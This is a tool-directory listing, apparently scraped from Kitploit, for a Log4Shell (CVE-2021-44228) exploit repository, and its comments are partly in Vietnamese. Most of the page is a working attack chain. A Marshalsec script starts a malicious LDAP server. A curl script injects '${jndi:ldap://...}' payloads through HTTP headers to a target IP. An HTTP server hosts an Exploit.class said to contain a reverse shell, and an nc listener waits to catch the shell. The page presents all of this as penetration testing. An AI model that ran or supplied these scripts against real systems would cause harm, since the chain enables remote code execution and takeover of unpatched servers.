Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-44228-Log4Shell- — Kiểm thử xâm nhập | Kitploit
Tools/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

Kiểm thử xâm nhập

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
101 year agoNot yet reviewed
Share

CVE-2021-44228-Log4Shell-

Penetration testing

  1. Create malicious LDAP Server (using Marshalsec) #!/bin/bash

Script: start_ldap_server.sh

Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389" HTTP_PORT="8000" ATTACKER_IP="192.168.0.101" REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..." java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT

  1. Send Log4Shell Payload from compromised Webserver

#!/bin/bash

Script: exploit_log4shell.sh

Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10" ATTACKER_IP="192.168.0.101" LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..." curl -X GET
"http://$TARGET_IP"
-H "User-Agent: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"
-H "X-Api-Version: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

Usage

Start LDAP server:

./start_ldap_server.sh

Run HTTP server to host Exploit.class (contains reverse shell):

python3 -m http.server 8000

Send payload from compromised Webserver

./exploit_log4shell.sh

Listen for reverse shell on attacker machine:

nc -lvnp 5555

Download Tool